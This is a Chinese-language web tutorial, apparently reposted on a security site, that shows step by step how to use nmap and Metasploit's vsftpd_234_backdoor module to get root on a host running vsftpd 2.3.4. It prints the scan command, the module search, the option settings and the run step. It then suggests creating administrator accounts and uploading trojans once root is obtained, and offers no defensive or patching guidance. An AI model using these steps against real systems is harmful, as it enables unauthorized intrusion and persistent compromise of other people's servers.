vsftpd version 2到2.3.4存在后门漏洞,攻击者可以通过该漏洞获取root权限。这 里用backtrack 集成的metasploit做测试,metasploit集成了各种各样的漏洞,我们可以在上面利用服务器、个人PC和应用程序的漏洞。开始菜单路径 backtrack/Exploitation tools/Network Exploitation tools/Metaspolit Framework/msfconsole, 用metaspolit内置的nmap进行主机扫描
1
|
nmap -sT -A www.91ri.org -sT
|
是指用隐蔽的tcp进行连接,-A是指在探测中对服务进行详细的版本测试。nmap是一款强大的扫描工具,简单的一些用法可以点击:《Nmap在实战中的高级用法》文章查看。
使用nmap结果图(单击可放大):
结果显示目标主机上运行着ftp服务器,版本为vsftpd2.3.4,这个版本的vsftpd存在漏洞,攻击者可以远程获取目标主机的root权限。
下面利用metasploit实施攻击过程,进入metasploit命令行,search vsftpd,搜索有关vsftpd的相关工具和攻击载荷。查找结果如下:
msf > search vsftpd
Matching Modules
================
Name Disclosure Date Rank Description
—- ————— —- ———–
exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 00:00:00 UTC excellent VSFTPD v2.3.4 Backdoor Command Execution
利用该漏洞命令:
use exploit/unix/ftp/vsftpd_234_backdoor
这样提示符就会提示进入到该路径下,show options查看需要设置的相关项:
msf exploit(vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
—- ————— ——– ———–
RHOST yes The target address
RPORT 21 yes The target port
Exploit target:
Id Name
– —-
0 Automatic
提示需要设置RHOST(攻击目标的IP)、RPORT(目标端口),由于这里是攻击ftp软件,端口默认为21,我们设置一下目标的ip,命令: set rhost 192.168.1.101, 在输入show options回车,确认下参数设置正确。检查无误,输入命令help,查看相关的操纵,一般是run或者exploit即可实施攻击.
结果如图(单击放大)
结果显示已经获取了目标主机的root权限,建立管理员账号、上传木马等动作就可以开始了。剩下的你懂得!
91ri.org:文章很简单 只是普通的exploit使用教程 不过我转这篇文章只想告诉大家metasploit不是只有ms08067!!!!!!! 最近在各个群里看过多了 所以再转篇科普。强烈推荐:《传说中的metasploit渗透防御终极手册?》文章,文末暴力评论值得深思!
原文:http://www.yeetrack.com/?p=229
顺补充:原文作者全文把metasploit打成了metaspolit 这个让我压力很大…假如作者看到了就改一个吧 还有 原文的网站其实不错的 但是貌似很怕被人转载 文章全传到百度网盘 也许怕某些没素质转文章不给版权的网站转走吧 哎 我倒觉得没必要吧 那些愿意给你连接的 都会给的 不愿意你这样做也没用 还影响用户体验…
本文由网络安全攻防研究室(www.91ri.org)信息安全小组收集整理,转载请注名出处!
Copyright © hongdaChiaki. All Rights Reserved. 鸿大千秋 版权所有
联系方式:
地址: 深圳市南山区招商街道沿山社区沿山路43号创业壹号大楼A栋107室
邮箱:service@hongdaqianqiu.com
备案号:粤ICP备15078875号